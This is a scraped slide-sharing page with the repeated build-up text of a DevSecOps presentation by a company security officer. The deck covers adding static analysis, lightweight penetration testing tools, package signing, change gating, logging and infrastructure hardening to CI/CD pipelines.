UploadLanguage (EN)Support
BusinessMobileSocial MediaMarketingTechnologyArt & PhotosCareerDesignEducationPresentations & Public SpeakingGovernment & NonprofitHealthcareInternetLawLeadership & ManagementAutomotiveEngineeringSoftwareRecruiting & HRRetailSalesServicesScienceSmall Business & EntrepreneurshipFoodEnvironmentEconomy & FinanceData & AnalyticsInvestor RelationsSportsSpiritualNews & PoliticsTravelSelf ImprovementReal EstateEntertainment & HumorHealth & MedicineDevices & HardwareLifestyle
Upload
Sign in
Tomas Honzak, profile picture
Uploaded byTomas Honzak
PDF, PPTX739 views

DevSecOps

The document outlines the principles and practices of integrating security into the DevOps process, known as DevSecOps. It emphasizes the importance of automating security practices, enhancing Continuous Integration/Continuous Deployment (CI/CD) pipelines with security testing, and fostering a culture of security throughout the development lifecycle. Key strategies include comprehensive security measures, including static code analysis, logging, configuration management, and a collaborative approach between development and security teams.

Technology
Related topics:
Information Security agile-software-development
Download as PDF, PPTX
1 / 83
2 / 83
3 / 83
Most read
4 / 83
5 / 83
6 / 83
7 / 83
8 / 83
9 / 83
10 / 83
11 / 83
12 / 83
13 / 83
14 / 83
15 / 83
16 / 83
17 / 83
18 / 83
19 / 83
Most read
20 / 83
DEVSECOPS TOMAS HONZAK, CISM CHIEF INFORMATION SECURITY OFFICER GOODDATA CORPORATION 1
TOMAS HONZAK / DEVSECOPS IMAGINE YOU HAVE A NICE AGILE COMPANY … 2
TOMAS HONZAK / DEVSECOPS IMAGINE YOU HAVE A NICE AGILE COMPANY … 2
TOMAS HONZAK / DEVSECOPS AND YOU RUN DEVOPS … 3
TOMAS HONZAK / DEVSECOPS AND YOU RUN DEVOPS … 3
TOMAS HONZAK / DEVSECOPS AND YOU RUN DEVOPS … 3
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS BUT THEN, SUDDENLY … 4
TOMAS HONZAK / DEVSECOPS WHAT SHALL YOU DO? 5
TOMAS HONZAK / DEVSECOPS WHAT SHALL YOU DO? “PANIC?” 5
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS OF COURSE NOT … YOU CAN GET CONSULTANTS! 6
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? Release Plan 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? Release Plan Change Control Board Approval 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? Release Plan Change Control Board Approval Release Manager 
 Approval 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? Release Plan Change Control Board Approval Release Manager 
 Approval Documented 
 Meeting
 Minutes 7
TOMAS HONZAK / DEVSECOPS BUT HOW WILL IT END UP? Release Plan Change Control Board Approval Release Manager 
 Approval Documented 
 Meeting
 Minutes Project 
 Manager 7
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis Secure Code Review 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis Secure Code Review 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis Secure Code Review 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis Secure Code Review 8
TOMAS HONZAK / DEVSECOPS AND WE STILL DID NOT ADD ANY “REAL” SECURITY … Dynamic code analysis Secure Code Review 8
TOMAS HONZAK / DEVSECOPS IF ONLY THERE WAS A BETTER WAY… 9
TOMAS HONZAK / DEVSECOPS IF ONLY THERE WAS A BETTER WAY… 9
TOMAS HONZAK / DEVSECOPS IF ONLY THERE WAS A BETTER WAY… 9
TOMAS HONZAK / DEVSECOPS IF ONLY THERE WAS A BETTER WAY… 9
TOMAS HONZAK / DEVSECOPS KEY DEVSECOPS PRINCIPLES 10
TOMAS HONZAK / DEVSECOPS KEY DEVSECOPS PRINCIPLES ▸ Embrace the cultural and practical changes ▸ Integrate security in the whole lifecycle, from requirements, design and analysis to testing, deployment and operations 10
TOMAS HONZAK / DEVSECOPS KEY DEVSECOPS PRINCIPLES ▸ Embrace the cultural and practical changes ▸ Integrate security in the whole lifecycle, from requirements, design and analysis to testing, deployment and operations ▸ Automate your critical processes ▸ Automation helps prevent errors and omissions and provides reliable assurance both for you and your auditors 10
TOMAS HONZAK / DEVSECOPS KEY DEVSECOPS PRINCIPLES ▸ Embrace the cultural and practical changes ▸ Integrate security in the whole lifecycle, from requirements, design and analysis to testing, deployment and operations ▸ Automate your critical processes ▸ Automation helps prevent errors and omissions and provides reliable assurance both for you and your auditors ▸ Empower your teams ▸ Like all things Agile, the teams must know what they are doing 10
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SAST 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE SAST 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE BURP SUITE OWASP ZAP SAST 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE VERIFY THE SIGNATURE BURP SUITE OWASP ZAP SAST 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE VERIFY THE SIGNATURE APPLY CONFIGURATION AS A CODE BURP SUITE OWASP ZAP SAST 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE VERIFY THE SIGNATURE APPLY CONFIGURATION AS A CODE BURP SUITE OWASP ZAP SAST SECURE AND AUTOMATED 11
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC JIRA # TO COMMIT
 MESSAGE “COMPLIANCE
 CHECK” SIGN THE PACKAGE VERIFY THE SIGNATURE APPLY CONFIGURATION AS A CODE BURP SUITE OWASP ZAP SAST SECURE AND AUTOMATED LOGGED ALERTED REVIEWED 11
TOMAS HONZAK / DEVSECOPS DEVSEC SUMMARY ▸ Move security as much to the left as possible ▸ Enhance your CI/CD pipeline with security testing tools ▸ Static Code Analysis (SonarQube) ▸ Lightweight penetration testing (Burp / OWASP ZAP) ▸ Enforce change control, approvals and SoD by gating (Zuul) ▸ “JIRA ticket = approval, peer review = SoD” ▸ Secure the environment and log everything ▸ (traceability and accountability) 12
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 APPLICATION
 LOGS
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 APPLICATION
 LOGS
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 LOGGED ALERTED APPLICATION
 LOGS
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 LOGGED ALERTED APPLICATION
 LOGS REVIEWED AND RESOLVED
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 LOGGED ALERTED APPLICATION
 LOGS REVIEWED AND RESOLVED ESCALATED
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 LOGGED ALERTED APPLICATION
 LOGS FEEDBACK REVIEWED AND RESOLVED ESCALATED
TOMAS HONZAK / DEVSECOPS ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS 13 LOGGED ALERTED APPLICATION
 LOGS FEEDBACK REVIEWED AND RESOLVED ESCALATED
TOMAS HONZAK / DEVSECOPS SECOPS SUMMARY ▸ Security Built-in on all levels ▸ Not only “DevSec”, but also non-functional requirement — secrets management, logging, encryption, … ▸ Images / Containers / Infrastructure / Network Hardening ▸ No unnecessary SW, no default passwords, firewalls in deny-all mode, monitored bastion hosts in DMZ with session logging and strong authentication/authorization … ▸ Configuration management, automated compliance ▸ Orchestrated CM, anything-as-a-code (including fw rules, access control etc.), code reviews + alerts ▸ Automated threat intelligence, scans, detection, alerting and response ▸ Vulnerability scans, HIDS/NIDS, log monitoring and analysis, SIEM, … ▸ Combination of Operations and Security in the same on-call team ▸ Not everyone can be top-class security expert — keep these in a virtual CSIRT, not in Ops 14
TOMAS HONZAK / DEVSECOPS OH, AND BY THE WAY … WERE YOU WORRIED ABOUT 15
TOMAS HONZAK / DEVSECOPS OH, AND BY THE WAY … WERE YOU WORRIED ABOUT 15
TOMAS HONZAK / DEVSECOPS OH, AND BY THE WAY … WERE YOU WORRIED ABOUT 15 SECURE 
 BY
 (DESIGN)
 DEVSECOPS
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? 16
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? Of course not :) :(, but you decreased the risks a lot: 16
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? Of course not :) :(, but you decreased the risks a lot: ▸ Increased prevention and detection capabilities 16
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? Of course not :) :(, but you decreased the risks a lot: ▸ Increased prevention and detection capabilities ▸ Faster response, no handover between Security and Ops 16
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? Of course not :) :(, but you decreased the risks a lot: ▸ Increased prevention and detection capabilities ▸ Faster response, no handover between Security and Ops ▸ Faster recovery thanks to automation and *-as-a-code 16
TOMAS HONZAK / DEVSECOPS OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW? Of course not :) :(, but you decreased the risks a lot: ▸ Increased prevention and detection capabilities ▸ Faster response, no handover between Security and Ops ▸ Faster recovery thanks to automation and *-as-a-code ▸ Cultural change, better communication and straightforward feedback 16
THANKS FOR YOUR ATTENTION!
 ANY QUESTIONS? Tomas Honzak tomas@honzak.cz